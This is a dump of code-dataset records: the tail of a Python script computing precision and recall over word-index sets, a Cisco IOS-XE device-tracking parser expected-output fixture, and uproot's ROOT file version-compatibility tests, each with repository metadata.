    set2=[[35, 7, 5, 32, 40, 13, 1, 31, 42], [9, 5, 32, 40, 13, 1, 31, 42], [35, 7, 5, 0, 16, 40, 13, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 14, 42], [9, 5, 0, 16, 40, 13, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 14, 42], [9, 5, 32, 1, 31, 40, 13, 42], [35, 7, 5, 32, 1, 31, 40, 13, 42], [9, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 31, 25, 42], [9, 5, 0, 16, 40, 13, 1, 31, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 25, 42], [9, 5, 32, 1, 14, 40, 13, 42], [9, 39, 40, 13, 1, 31, 25, 42], [35, 7, 5, 32, 1, 14, 40, 13, 42], [9, 5, 32, 40, 13, 1, 31, 25, 42], [35, 7, 5, 32, 40, 13, 1, 14, 25, 42], [9, 5, 0, 16, 1, 31, 40, 13, 42], [9, 5, 0, 16, 40, 13, 1, 14, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 25, 42], [35, 7, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 40, 13, 1, 14, 25, 42], [9, 39, 40, 13, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 31, 42], [9, 39, 40, 13, 1, 31, 42], [9, 5, 0, 16, 1, 14, 40, 13, 42], [35, 7, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 14, 25, 42], [9, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 42], [9, 5, 0, 16, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 42], [35, 7, 39, 1, 31, 40, 13, 42], [9, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 31, 42], [35, 7, 39, 40, 13, 1, 31, 25, 42], [9, 39, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 39, 1, 14, 40, 13, 42], [9, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 14, 25, 42], [9, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 5, 0, 16, 1, 31, 40, 13, 42], [35, 7, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 1, 31, 40, 13, 42], [35, 7, 5, 0, 16, 1, 14, 40, 13, 42], [9, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 1, 14, 40, 13, 42], [35, 7, 39, 40, 13, 1, 14, 19, 35, 34, 42], [9, 39, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 40, 13, 1, 14, 19, 35, 34, 42]]
    #===========================================================================
    # set1=[[9, 28, 38, 19, 35, 27, 42], [9, 28, 18, 38, 25, 42], [9, 28, 18, 38, 19, 35, 27, 42], [9, 28, 0, 15, 38, 19, 35, 27, 42], [35, 7, 28, 38, 19, 35, 27, 42], [35, 7, 28, 18, 38, 25, 42], [35, 7, 28, 18, 38, 19, 35, 27, 42], [35, 7, 28, 0, 15, 38, 19, 35, 27, 42]]
    # set2=[[35, 7, 28, 38, 19, 35, 27, 42], [9, 28, 0, 15, 38, 19, 35, 27, 42], [9, 28, 18, 38, 25, 42], [35, 7, 28, 0, 15, 38, 19, 35, 27, 42], [35, 7, 28, 18, 38, 19, 35, 27, 42], [9, 28, 38, 19, 35, 27, 42], [9, 28, 18, 38, 19, 35, 27, 42], [35, 7, 28, 18, 38, 25, 42]]
    #===========================================================================
    wordLocalistMapPath='../data/dataFiles/map_localist_words.txt'
    from loadFiles import getWordLocalistMap
    mapIndexWord=getWordLocalistMap(wordLocalistMapPath)

    print [indicesToWords(indices,mapIndexWord) for indices in set1]
    print [indicesToWords(indices,mapIndexWord) for indices in set2]

    print len(set1)
    print len(set2)

    precision,recall,fscore=precisionRecallFScore(set1,set2)
    print precision
    print recall
    print fscore
0a5005badfb4a907ca77e2f1c5a7394f75d3f15d | 2,645 | py | Python | src/genie/libs/parser/iosxe/tests/ShowDeviceTrackingMessages/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowDeviceTrackingMessages/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowDeviceTrackingMessages/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"entries": {
1: {
"timestamp": "Wed Jul 21 20:31:23.000",
"vlan": 1,
"interface": "Et0/1",
"mac": "aabb.cc00.0300",
"protocol": "ARP::REP",
"ip": "192.168.23.3",
"ignored": False,
},
2: {
"timestamp": "Wed Jul 21 20:31:23.000",
"vlan": 1006,
"interface": "Et0/1",
"mac": "aabb.cc00.0300",
"protocol": "ARP::REP",
"ip": "192.168.23.3",
"ignored": False,
},
3: {
"timestamp": "Wed Jul 21 20:31:25.000",
"vlan": 1006,
"interface": "Et0/1",
"mac": "aabb.cc00.0300",
"protocol": "ARP::REP",
"ip": "192.168.23.3",
"ignored": True,
},
4: {
"timestamp": "Wed Jul 21 20:31:26.000",
"vlan": 10,
"interface": "Et0/0",
"protocol": "NDP::NS",
"ip": "FE80::A8BB:CCFF:FE00:100",
"ignored": False,
},
5: {
"timestamp": "Wed Jul 21 20:31:27.000",
"vlan": 10,
"interface": "Et0/0",
"mac": "aabb.cc00.0100",
"protocol": "NDP::NA",
"ip": "FE80::A8BB:CCFF:FE00:100",
"ignored": False,
"drop_reason": "Packet accepted but not forwarded",
},
6: {
"timestamp": "Wed Jul 21 20:31:27.000",
"vlan": 10,
"interface": "Et0/0",
"protocol": "NDP::NS",
"ip": "A::1",
"ignored": False,
},
7: {
"timestamp": "Wed Jul 21 20:31:27.000",
"vlan": 10,
"interface": "Et0/0",
"mac": "aabb.cc00.0100",
"protocol": "NDP::RA",
"ip": "FE80::A8BB:CCFF:FE00:100",
"ignored": False,
"drop_reason": "Packet not authorized on port",
},
8: {
"timestamp": "Wed Jul 21 20:31:28.000",
"vlan": 10,
"interface": "Et0/0",
"mac": "aabb.cc00.0100",
"protocol": "NDP::NA",
"ip": "A::1",
"ignored": False,
"drop_reason": "Packet accepted but not forwarded"
}
}
} | 34.350649 | 67 | 0.342155 | 239 | 2,645 | 3.769874 | 0.263598 | 0.106548 | 0.133185 | 0.150943 | 0.932297 | 0.914539 | 0.844617 | 0.844617 | 0.810211 | 0.669256 | 0 | 0.164057 | 0.493006 | 2,645 | 77 | 68 | 34.350649 | 0.50783 | 0 | 0 | 0.623377 | 0 | 0 | 0.358277 | 0.027211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# tests/test_versions.py (from the masonproffitt/uproot repository, BSD-3-Clause license)

#!/usr/bin/env python
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot/blob/master/LICENSE
import pytest
try:
import lzma
except ImportError:
lzma = pytest.importorskip('backports.lzma')
lz4 = pytest.importorskip('lz4')
import uproot
class Test(object):
sample = {
b"n": [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4],
b"b": [True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False],
b"ab": [[False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True]],
b"Ab": [[], [True], [True, True], [True, True, True], [True, True, True, True], [], [False], [False, False], [False, False, False], [False, False, False, False], [], [True], [True, True], [True, True, True], [True, True, True, True], [], [False], [False, False], [False, False, False], [False, False, False, False], [], [True], [True, True], [True, True, True], [True, True, True, True], [], [False], [False, False], [False, False, False], [False, False, False, False]],
b"i1": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai1": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai1": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u1": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au1": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au1": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"i2": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai2": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai2": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au2": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au2": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"i4": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai4": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai4": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u4": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au4": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au4": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"i8": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai8": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai8": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u8": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au8": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au8": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"f4": [-14.899999618530273, -13.899999618530273, -12.899999618530273, -11.899999618530273, -10.899999618530273, -9.899999618530273, -8.899999618530273, -7.900000095367432, -6.900000095367432, -5.900000095367432, -4.900000095367432, -3.9000000953674316, -2.9000000953674316, -1.899999976158142, -0.8999999761581421, 0.10000000149011612, 1.100000023841858, 2.0999999046325684, 3.0999999046325684, 4.099999904632568, 5.099999904632568, 6.099999904632568, 7.099999904632568, 8.100000381469727, 9.100000381469727, 10.100000381469727, 11.100000381469727, 12.100000381469727, 13.100000381469727, 14.100000381469727],
b"af4": [[-13.899999618530273, -12.899999618530273, -11.899999618530273], [-12.899999618530273, -11.899999618530273, -10.899999618530273], [-11.899999618530273, -10.899999618530273, -9.899999618530273], [-10.899999618530273, -9.899999618530273, -8.899999618530273], [-9.899999618530273, -8.899999618530273, -7.900000095367432], [-8.899999618530273, -7.900000095367432, -6.900000095367432], [-7.900000095367432, -6.900000095367432, -5.900000095367432], [-6.900000095367432, -5.900000095367432, -4.900000095367432], [-5.900000095367432, -4.900000095367432, -3.9000000953674316], [-4.900000095367432, -3.9000000953674316, -2.9000000953674316], [-3.9000000953674316, -2.9000000953674316, -1.899999976158142], [-2.9000000953674316, -1.899999976158142, -0.8999999761581421], [-1.899999976158142, -0.8999999761581421, 0.10000000149011612], [-0.8999999761581421, 0.10000000149011612, 1.100000023841858], [0.10000000149011612, 1.100000023841858, 2.0999999046325684], [1.100000023841858, 2.0999999046325684, 3.0999999046325684], [2.0999999046325684, 3.0999999046325684, 4.099999904632568], [3.0999999046325684, 4.099999904632568, 5.099999904632568], [4.099999904632568, 5.099999904632568, 6.099999904632568], [5.099999904632568, 6.099999904632568, 7.099999904632568], [6.099999904632568, 7.099999904632568, 8.100000381469727], [7.099999904632568, 8.100000381469727, 9.100000381469727], [8.100000381469727, 9.100000381469727, 10.100000381469727], [9.100000381469727, 10.100000381469727, 11.100000381469727], [10.100000381469727, 11.100000381469727, 12.100000381469727], [11.100000381469727, 12.100000381469727, 13.100000381469727], [12.100000381469727, 13.100000381469727, 14.100000381469727], [13.100000381469727, 14.100000381469727, 15.100000381469727], [14.100000381469727, 15.100000381469727, 16.100000381469727], [15.100000381469727, 16.100000381469727, 17.100000381469727]],
b"Af4": [[], [-15.0], [-15.0, -13.899999618530273], [-15.0, -13.899999618530273, -12.800000190734863], [-15.0, -13.899999618530273, -12.800000190734863, -11.699999809265137], [], [-10.0], [-10.0, -8.899999618530273], [-10.0, -8.899999618530273, -7.800000190734863], [-10.0, -8.899999618530273, -7.800000190734863, -6.699999809265137], [], [-5.0], [-5.0, -3.9000000953674316], [-5.0, -3.9000000953674316, -2.799999952316284], [-5.0, -3.9000000953674316, -2.799999952316284, -1.7000000476837158], [], [0.0], [0.0, 1.100000023841858], [0.0, 1.100000023841858, 2.200000047683716], [0.0, 1.100000023841858, 2.200000047683716, 3.299999952316284], [], [5.0], [5.0, 6.099999904632568], [5.0, 6.099999904632568, 7.199999809265137], [5.0, 6.099999904632568, 7.199999809265137, 8.300000190734863], [], [10.0], [10.0, 11.100000381469727], [10.0, 11.100000381469727, 12.199999809265137], [10.0, 11.100000381469727, 12.199999809265137, 13.300000190734863]],
b"f8": [-14.9, -13.9, -12.9, -11.9, -10.9, -9.9, -8.9, -7.9, -6.9, -5.9, -4.9, -3.9000000000000004, -2.9000000000000004, -1.9000000000000004, -0.9000000000000004, 0.09999999999999964, 1.0999999999999996, 2.0999999999999996, 3.0999999999999996, 4.1, 5.1, 6.1, 7.1, 8.1, 9.1, 10.1, 11.1, 12.1, 13.1, 14.1],
b"af8": [[-13.9, -12.9, -11.9], [-12.9, -11.9, -10.9], [-11.9, -10.9, -9.9], [-10.9, -9.9, -8.9], [-9.9, -8.9, -7.9], [-8.9, -7.9, -6.9], [-7.9, -6.9, -5.9], [-6.9, -5.9, -4.9], [-5.9, -4.9, -3.9000000000000004], [-4.9, -3.9000000000000004, -2.9000000000000004], [-3.9000000000000004, -2.9000000000000004, -1.9000000000000004], [-2.9000000000000004, -1.9000000000000004, -0.9000000000000004], [-1.9000000000000004, -0.9000000000000004, 0.09999999999999964], [-0.9000000000000004, 0.09999999999999964, 1.0999999999999996], [0.09999999999999964, 1.0999999999999996, 2.0999999999999996], [1.0999999999999996, 2.0999999999999996, 3.0999999999999996], [2.0999999999999996, 3.0999999999999996, 4.1], [3.0999999999999996, 4.1, 5.1], [4.1, 5.1, 6.1], [5.1, 6.1, 7.1], [6.1, 7.1, 8.1], [7.1, 8.1, 9.1], [8.1, 9.1, 10.1], [9.1, 10.1, 11.1], [10.1, 11.1, 12.1], [11.1, 12.1, 13.1], [12.1, 13.1, 14.1], [13.1, 14.1, 15.1], [14.1, 15.1, 16.1], [15.1, 16.1, 17.1]],
b"Af8": [[], [-15.0], [-15.0, -13.9], [-15.0, -13.9, -12.8], [-15.0, -13.9, -12.8, -11.7], [], [-10.0], [-10.0, -8.9], [-10.0, -8.9, -7.8], [-10.0, -8.9, -7.8, -6.7], [], [-5.0], [-5.0, -3.9], [-5.0, -3.9, -2.8], [-5.0, -3.9, -2.8, -1.7], [], [0.0], [0.0, 1.1], [0.0, 1.1, 2.2], [0.0, 1.1, 2.2, 3.3], [], [5.0], [5.0, 6.1], [5.0, 6.1, 7.2], [5.0, 6.1, 7.2, 8.3], [], [10.0], [10.0, 11.1], [10.0, 11.1, 12.2], [10.0, 11.1, 12.2, 13.3]],
b"str": [b"hey-0", b"hey-1", b"hey-2", b"hey-3", b"hey-4", b"hey-5", b"hey-6", b"hey-7", b"hey-8", b"hey-9", b"hey-10", b"hey-11", b"hey-12", b"hey-13", b"hey-14", b"hey-15", b"hey-16", b"hey-17", b"hey-18", b"hey-19", b"hey-20", b"hey-21", b"hey-22", b"hey-23", b"hey-24", b"hey-25", b"hey-26", b"hey-27", b"hey-28", b"hey-29"]
}
def compare(self, arrays):
assert set(arrays.keys()) == set(self.sample.keys())
for name in arrays.keys():
assert arrays[name].tolist() == self.sample[name]
def test_5_23_02(self):
# 2009-02-26, TTree version 16
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.23.02-{0}.root".format(compression))["sample"].arrays())
def test_5_24_00(self):
# 2009-06-30, TTree version 16
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.24.00-{0}.root".format(compression))["sample"].arrays())
def test_5_25_02(self):
# 2009-10-01, TTree version 17
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.25.02-{0}.root".format(compression))["sample"].arrays())
def test_5_26_00(self):
# 2009-12-14, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.26.00-{0}.root".format(compression))["sample"].arrays())
def test_5_27_02(self):
# 2010-04-27, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.27.02-{0}.root".format(compression))["sample"].arrays())
def test_5_28_00(self):
# 2010-12-15, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.28.00-{0}.root".format(compression))["sample"].arrays())
def test_5_29_02(self):
# 2011-04-21, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.29.02-{0}.root".format(compression))["sample"].arrays())
def test_5_30_00(self):
# 2011-06-28, TTree version 19
for compression in "uncompressed", "zlib", "lzma":
self.compare(uproot.open("tests/samples/sample-5.30.00-{0}.root".format(compression))["sample"].arrays())
def test_6_08_04(self):
# 2017-01-13, TTree version 19
for compression in "uncompressed", "zlib", "lzma":
self.compare(uproot.open("tests/samples/sample-6.08.04-{0}.root".format(compression))["sample"].arrays())
def test_6_10_05(self):
# 2017-07-28, TTree version 19
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.10.05-{0}.root".format(compression))["sample"].arrays())
def test_6_14_00(self):
# 2018-06-20, TTree version 20
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.14.00-{0}.root".format(compression))["sample"].arrays())
def test_6_16_00(self):
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.16.00-{0}.root".format(compression))["sample"].arrays())
def test_6_18_00(self):
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.18.00-{0}.root".format(compression))["sample"].arrays())
def test_6_20_04(self):
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.20.04-{0}.root".format(compression))["sample"].arrays())
| 129.014599 | 1,877 | 0.527242 | 3,050 | 17,675 | 3.041639 | 0.047213 | 0.060149 | 0.081276 | 0.110596 | 0.88229 | 0.85685 | 0.688477 | 0.522691 | 0.522475 | 0.51342 | 0 | 0.423466 | 0.178331 | 17,675 | 136 | 1,878 | 129.963235 | 0.215314 | 0.023876 | 0 | 0.153846 | 0 | 0 | 0.066415 | 0.030046 | 0 | 0 | 0 | 0 | 0.021978 | 1 | 0.164835 | false | 0 | 0.065934 | 0 | 0.252747 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
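The per-version test methods in `test_versions.py` above repeat the same open-and-compare loop, varying only the ROOT version string and the compressions built for that version. A small sketch of generating the sample paths from one table instead — the `CASES` entries below are a subset for illustration, not the full list the file covers:

```python
# Hypothetical sketch: one table of (version -> supported compressions)
# replaces the repeated per-method loops.
CASES = {
    "5.23.02": ("uncompressed", "zlib"),
    "5.30.00": ("uncompressed", "zlib", "lzma"),
    "6.10.05": ("uncompressed", "zlib", "lzma", "lz4"),
}

def sample_paths(cases=CASES):
    """Expand the table into the sample file paths the tests would open."""
    return [
        "tests/samples/sample-{0}-{1}.root".format(version, compression)
        for version, compressions in sorted(cases.items())
        for compression in compressions
    ]
```

With pytest, the same table could feed `@pytest.mark.parametrize` so each sample file shows up as its own test case rather than one loop iteration inside a shared method.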
6a87205aeb3d34bd45b62e4b3ca500971354fb51 | 16,212 | py | Python | nova/tests/compute/test_host_api.py | bopopescu/nova-39 | 36c7a819582b838b7bbab11d55ca3d991a587405 | [
"Apache-2.0"
] | 1 | 2021-04-08T10:13:03.000Z | 2021-04-08T10:13:03.000Z | nova/tests/compute/test_host_api.py | bopopescu/nova-39 | 36c7a819582b838b7bbab11d55ca3d991a587405 | [
"Apache-2.0"
] | null | null | null | nova/tests/compute/test_host_api.py | bopopescu/nova-39 | 36c7a819582b838b7bbab11d55ca3d991a587405 | [
"Apache-2.0"
